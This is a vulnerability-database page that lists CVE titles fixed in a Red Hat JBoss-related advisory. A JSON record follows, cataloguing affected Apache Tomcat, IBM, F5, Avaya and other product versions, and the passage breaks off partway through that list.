Red Hat would like to thank James Roper of Typesafe for reporting the CVE-2014-0193 issue, CA Technologies for reporting the CVE-2014-3472 issue, Alexander Papadakis for reporting the CVE-2014-3530 issue, and David Jorm for reporting the CVE-2014-8114 and CVE-2014-8115 issues. Bugs fixed (https://bugzilla.redhat.com/):

1019176 - CVE-2013-4002 Xerces-J2 OpenJDK: XML parsing Denial of Service (JAXP, 8017298) 1049736 - CVE-2014-0005 PicketBox/JBossSX: Unauthorized access to and modification of application server configuration and state by application 1065139 - CVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of user-supplied content in outputText tags and EL expressions 1072776 - CVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter 1088342 - CVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs 1092783 - CVE-2014-0193 netty: DoS via memory exhaustion during data aggregation 1102030 - CVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content length header 1102038 - CVE-2014-0119 Tomcat/JBossWeb: XML parser hijack by malicious web application 1103815 - CVE-2014-3472 JBoss AS Security: Invalid EJB caller role check implementation 1107901 - CVE-2014-3490 RESTEasy: XXE via parameter entities 1109196 - CVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter 1112987 - CVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage 1120495 - CVE-2014-3558 Hibernate Validator: JSM bypass via ReflectionHelper 1129074 - CVE-2014-3577 Apache HttpComponents client / Apache CXF: SSL hostname verification bypass, incomplete CVE-2012-6153 fix 1129916 - CVE-2012-6153 Apache HttpComponents client / Apache CXF: SSL hostname verification bypass, incomplete CVE-2012-5783 fix 1131882 - CVE-2014-3578 Spring Framework: Directory traversal 1148260 - CVE-2014-3682 jbpm-designer: XXE in BPMN2 import 1165936 - CVE-2014-3625 Spring Framework: directory traversal flaw 1169544 - CVE-2014-8114 UberFire: Information disclosure and RCE via insecure file upload/download servlets 1169545 - CVE-2014-8115 KIE Workbench: Insufficient authorization constraints

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201405-0541",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "apache",
        "version": "7.0.45"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "apache",
        "version": "7.0.48"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "apache",
        "version": "7.0.43"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "apache",
        "version": "7.0.44"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "apache",
        "version": "7.0.47"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "apache",
        "version": "7.0.49"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "apache",
        "version": "7.0.42"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "apache",
        "version": "7.0.50"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "apache",
        "version": "7.0.46"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apache",
        "version": "7.0.52"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.35"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.14"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.3"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.4"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.36"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.7"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.24"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.11"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.7"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.17"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.10"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.9"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.23"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.5"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.31"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.25"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.32"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.10"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.37"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.18"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.27"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.3"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "8.0.3"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.15"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.28"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.24"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.36"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.40"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.6"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.9"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.39"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.22"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.5"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.35"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.12"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.16"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.2"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "8.0.1"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.1"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.21"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.26"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.28"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.38"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.4"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.12"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.34"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.19"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.30"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.16"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.31"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.32"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.13"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.20"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.14"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.8"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.33"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.33"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.19"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.13"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.29"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.30"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.6"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.20"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.27"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.1"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.26"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.18"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.8"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.29"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.11"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.2"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "6.0.15"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.41"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "apache",
        "version": "7.0.37"
      },
      {
        "model": "tomcat",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.39"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.0"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.17"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "8.0.0"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.0"
      },
      {
        "model": "openpages grc platform",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.1.4"
      },
      {
        "model": "big-ip wom hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "rational sap connector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0.4"
      },
      {
        "model": "rational doors web access",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5.21"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.2"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apache",
        "version": "6.0.39"
      },
      {
        "model": "algo audit and compliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.2"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "integration bus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0.0"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip gtm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "big-ip apm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "big-ip webaccelerator hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip gtm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "secure analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2014.1"
      },
      {
        "model": "tivoli application dependency discovery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2"
      },
      {
        "model": "rational build forge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.21"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "rational test workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.12"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.3.0.5"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "rational sap connector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0.2"
      },
      {
        "model": "rational directory server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1.1"
      },
      {
        "model": "rational automation framework",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1.1"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip asm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "san volume controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.5"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "big-ip edge gateway hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "9.9.1"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "flex system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.2"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.5"
      },
      {
        "model": "aura system platform sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "openpages grc platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.1"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1.2"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.1.0"
      },
      {
        "model": "rational test workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.52"
      },
      {
        "model": "big-ip psm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "rational test virtualization server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.0.0"
      },
      {
        "model": "flashsystem 9843-ae1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "840"
      },
      {
        "model": "rational test workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.11"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1"
      },
      {
        "model": "rational test workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.01"
      },
      {
        "model": "rational test virtualization server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.2"
      },
      {
        "model": "flashsystem 9848-ae1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v840"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.23"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aura application server sip core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "rational sap connector",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0.5"
      },
      {
        "model": "big-ip webaccelerator hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.2.1"
      },
      {
        "model": "tomcat beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apache",
        "version": "7.0.4"
      },
      {
        "model": "secure analytics 2014.3r1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "rational test workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.0"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.3.0.3"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.2.0.8"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.3.0.5"
      },
      {
        "model": "arx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.0"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.1"
      },
      {
        "model": "tomcat",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apache",
        "version": "6.0.41"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "security threat response manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2012.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "openvms csws java",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.0.29"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.40"
      },
      {
        "model": "jboss enterprise application platform el5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "arx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.4"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.4"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.3"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip ltm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip analytics hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "rational test workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.02"
      },
      {
        "model": "urbancode deploy",
        "scope": "eq",
        "trust": 0.3,
